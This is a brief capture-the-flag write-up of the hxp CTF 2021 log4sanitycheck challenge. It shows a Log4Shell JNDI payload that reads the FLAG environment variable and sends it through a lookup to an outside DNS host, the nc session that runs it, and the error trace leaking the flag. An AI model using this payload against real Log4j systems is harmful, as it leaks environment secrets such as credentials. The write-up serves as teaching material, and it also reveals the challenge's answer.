Tags: misc log4j sanity 

Rating: 4.5

It can be seen from the Dockerfile that the `FLAG` environment variable contains the flag.

```dockerfile
CMD ynetd -np y -lm -1 -lpid 64 -lt 10 -t 30 "FLAG='$(cat /flag.txt)' /home/ctf/run.sh"
```

We can leak this with the following string:

```
${jndi:dns://pwn.nandynarwhals.org/leak=${env:FLAG:-lol}}
```

Using this payload leaks the flag in the error messages because the domain name ends up being too
long.

```console
nc 65.108.176.77 1337
What is your favourite CTF?
${jndi:dns://pwn.nandynarwhals.org/leak=${env:FLAG:-lol}}
:(
2021-12-19 21:15:06,116 main WARN Error looking up JNDI resource [dns://border.spro.ink/leak=hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}]. javax.naming.InvalidNameException: Label exceeds 63 octets: leak=hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}; remaining name 'leak=hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}'
at jdk.naming.dns/com.sun.jndi.dns.DnsName.verifyLabel(DnsName.java:487)
at jdk.naming.dns/com.sun.jndi.dns.DnsName.add(DnsName.java:306)
at jdk.naming.dns/com.sun.jndi.dns.DnsName.parse(DnsName.java:446)
at jdk.naming.dns/com.sun.jndi.dns.DnsName.<init>(DnsName.java:135)
at jdk.naming.dns/com.sun.jndi.dns.DnsContext.fullyQualify(DnsContext.java:588)
at jdk.naming.dns/com.sun.jndi.dns.DnsContext.c_lookup(DnsContext.java:288)
at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
...
```

Full writeup here: [https://nandynarwhals.org/hxp-ctf-2021-log4sanitycheck/](https://nandynarwhals.org/hxp-ctf-2021-log4sanitycheck/)

Original writeup (https://nandynarwhals.org/hxp-ctf-2021-log4sanitycheck/).